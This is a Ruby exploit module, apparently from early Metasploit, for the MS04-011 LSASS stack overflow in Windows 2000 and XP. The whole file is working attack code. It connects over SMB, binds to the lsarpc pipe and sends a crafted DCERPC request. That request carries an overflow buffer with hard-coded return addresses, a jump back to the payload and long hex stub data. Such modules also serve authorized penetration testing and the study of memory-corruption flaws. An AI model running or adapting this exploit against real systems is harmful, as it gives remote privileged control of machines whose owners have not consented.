require 'msf/core' module Msf class Exploits::Windows::MS04_011_LSASS < Msf::Exploit::Remote # # This module exploits a vulnerability in the LSASS service # include Exploit::Remote::DCERPC include Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft LSASS MSO4-011 Overflow', 'Description' => %q{ This module exploits a stack overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. }, 'Author' => [ 'hdm' ], 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '5248' ], [ 'MSB', 'MS04-011' ], [ 'MIL', '36' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Targets' => [ # Automatic [ 'Automatic Targetting', { 'Platform' => 'win', 'Rets' => [ ], }, ], # Windows 2000 [ 'Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x773242e0 ], }, ], # Windows XP [ 'Windows XP English', { 'Platform' => 'win', 'Rets' => [ 0x7449bf1a ], }, ], ], 'DefaultTarget' => 0)) end def exploit # # Connect to the remote SMB service # print_status("Connecting to the target system...") connect # # Request a session, authenticate, and connect to IPC$ # smb_login # # Check the remote OS name and version # os = smb_peer_lm over ='' case os # Windows 2000 requires that the string be unicode formatted # and give us a nice set of registers which point back to # the un-unicoded data. We simply return to a nop sled that # jumps over the return address, some trash, and into the # final payload. Easy as pie. when /2000/ str = Rex::Text.rand_text_alphanumeric(3500) str[2020, 4] = [targets[1]['Rets'][0]].pack('V') str[2104, payload.encoded.length ] = payload.encoded over = self.make_lsass_stub_beg + self.unicode(str) + make_lsass_stub_end # Windows XP is a bit different, we need to use an ascii # buffer and a jmp esp. The esp register points to an # eight byte segment at the end of our buffer in memory, # we make these bytes jump back to the beginning of the # buffer, giving us about 1936 bytes of space for a # payload. when /XP/ str = Rex::Text.rand_text_alphanumeric(7000) str[0, payload.encoded.length ] = payload.encoded str[1964, 4] = [targets[2]['Rets'][0]].pack('V') str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload over = self.make_lsass_stub_beg + str + make_lsass_stub_end when print_status("No target is available for #{ os }") return end # # Open the lsarpc named pipe # fid = smb_create('\lsarpc') # # Bind to LSASS over the LSARPC pipe # smb_dcerpc_bind(fid, 'LSA_DS') # # Send the malicious DCERPC request # smb_dcerpc_call(fid, 9, over) # # Perform any required client-side payload handling # handler end def make_lsass_stub_beg "\xad\x0d\x00\x00\x00\x00\x00\x00\xad\x0d\x00\x00" end def make_lsass_stub_end "\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00"+ "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x50\x6a\x40\x00"+ "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"+ "\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00"+ "\x01\x00\x00\x00\x00\x00\x00\x00\x50\x80\x23\x00\xdf\xaf\xff\x33"+ "\x9b\x78\x70\x43\xc5\x0a\x4d\x98\x96\x02\x64\x92\xc1\xee\x70\x32"+ "\x65\xc1\xef\x7b\xd6\xaa\xd6\x09\x21\xf6\xe7\xd1\x4c\xdf\x6a\x2d"+ "\x0a\xfb\x43\xea\xda\x07\x24\x84\x88\x52\x9e\xa8\xa1\x7f\x4b\x60"+ "\xec\x94\x57\x33\x06\x93\x92\x25\xd6\xac\xdc\x89\x68\x5e\xbb\x32"+ "\x2b\x17\x68\xf2\x06\xb7\x86\xac\x81\xfe\x52\x27\xf5\x80\x11\x0d"+ "\x4e\x2e\x1b\xa3\x44\x8a\x58\xed\xf3\x9c\xe9\x31\x01\x72\xa6\xab"+ "\xfa\xa8\x05\x00\x37\x60\x6b\x81\xef\xf4\x96\x9a\xf7\x67\x95\x27"+ "\x7a\x25\xef\x6f\x0e\xff\x2d\x15\x7f\x23\x1c\xa7\x56\x94\x4a\x18"+ "\x98\xc6\xd8\xd2\x29\x5b\x57\xb8\x5d\x3a\x93\x58\x45\x77\x36\xe3"+ "\xd1\x36\x87\xff\xe3\x94\x0f\x00\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3"+ "\xa3\x25\xce\xd4\xaf\x39\xeb\x17\xcf\x22\x43\xd9\x0c\xce\x37\x86"+ "\x46\x54\xd6\xce\x00\x30\x36\xae\xf9\xb5\x2b\x11\xa0\xfe\xa3\x4b"+ "\x2e\x05\xbe\x54\xa9\xd8\xa5\x76\x83\x5b\x63\x01\x1c\xd4\x56\x72"+ "\xcd\xdc\x4a\x1d\x77\xda\x8a\x9e\xba\xcb\x6c\xe8\x19\x5d\x68\xef"+ "\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x04\xd9\xda\x4c\x42\x31"+ "\xd9\xbd\x99\x06\xf7\xa3\x0a\x19\x49\x07\x77\xf0\xdb\x7c\x43\xfa"+ "\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a"+ "\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x54\x6d\xed"+ "\x53\xf9\x73\xc6\x6e\xa8\xc0\x97\xcf\x56\x3b\x61\xdf\xab\x83\x18"+ "\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8"+ "\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70"+ "\xe6\x08\xe6\x2a\x4f\x24\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3"+ "\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x6c\x28\x42"+ "\x07\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\xec\x35\x5e\x98\x71\x50"+ "\x60\x35\x76\x53\x40\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08"+ "\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71"+ "\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7"+ "\xbc\xe1\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8"+ "\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88"+ "\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01"+ "\xa9\x61\x34\x75\x98\x1e\x05\x59\xb3\x46\x44\xff\x2b\x98\x04\x88"+ "\x89\xfd\x7f\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x3a\x3c\xec\xd9"+ "\x9b\x8c\x93\x93\x2b\x44\x86\x8b\x80\x83\x23\x00\xdf\xaf\xff\x33"+ "\x9b\x78\x70\x43\xf1\x55\x87\xb1\xa1\xb3\x8e\x79\x02\x70\x82\x6c"+ "\x0b\xc1\xef\x96\xf1\xef\xdd\xa2\x69\x86\xc7\x85\x09\x7e\xf0\x2f"+ "\x8e\xa0\x5f\xea\x39\x2e\x24\xf0\x82\x30\x26\xa8\xa1\x4f\xc6\x5c"+ "\xec\x94\x87\x52\x9b\x93\x92\xf3\xa3\x1b\xc7\x8f\x9e\xb3\xbb\x32"+ "\x2b\x17\x54\xf2\x06\x0c\x86\x92\x0f\xb8\xe0\x27\x50\xaa\xeb\xf5"+ "\x4e\x2b\x1b\xb2\x44\xe6\x58\x02\xd7\x65\xdc\x31\x01\xec\xa6\xab"+ "\xfa\xa8\x05\x00\x37\x60\x4f\xa1\x3c\x4f\x7a\x9a\x10\x67\x95\xc2"+ "\x5b\x25\xef\x76\x0e\xff\x2d\x15\x7f\x23\x1c\x77\x56\x94\x4a\x18"+ "\x98\xc6\xd8\xd2\x29\x44\x57\xb8\x40\x3a\x93\x58\x45\x77\x36\x36"+ "\x07\x35\x2a\xff\x00\x94\x5c\x80\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3"+ "\xbc\xf8\xce\x05\x77\x39\x40\x17\xcf\x63\x43\x77\x27\xce\x37\x86"+ "\x46\x54\xd6\xce\x00\x30\x36\xae\x9f\x24\x2b\x5a\xa0\xfe\xa3\x4b"+ "\x2e\x7e\xf7\x54\xa9\xd8\xa5\x76\x83\x7b\x63\x01\x1c\xd4\x56\x17"+ "\x02\xdc\x4a\x89\x77\xda\x8f\x9e\xba\xcb\x37\xe8\x19\x5d\x68\x38"+ "\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x5a\xd9\x6d\x4c\x42\x31"+ "\xd9\xf2\x99\x06\xf7\x0c\x99\xbe\x49\x07\x77\xf0\x8b\x7c\x43\xfa"+ "\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a"+ "\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x98\x6d\xed"+ "\x53\xf9\x73\xc6\xa5\xa8\xf7\x66\xcf\x56\x3b\x61\xdf\xab\x83\x18"+ "\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8"+ "\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70"+ "\xe6\x08\xe6\x2a\x4f\x92\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3"+ "\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x5d\x28\x42"+ "\x34\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\x2b\x35\x5e\x98\x71\x50"+ "\x2c\x35\x76\x53\x4e\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08"+ "\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71"+ "\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7"+ "\xbc\x77\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8"+ "\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88"+ "\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01"+ "\xa9\x61\x34\x75\x98\x1e\x6f\x59\xb3\x46\x44\xff\x2b\x98\x04\x88"+ "\x89\xfd\x1c\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x79\x26\x46\xf7"+ "\xbf\xa1\x12\x73\x23\x44\x86\x8b\x50\x6a\x40\x00" end end end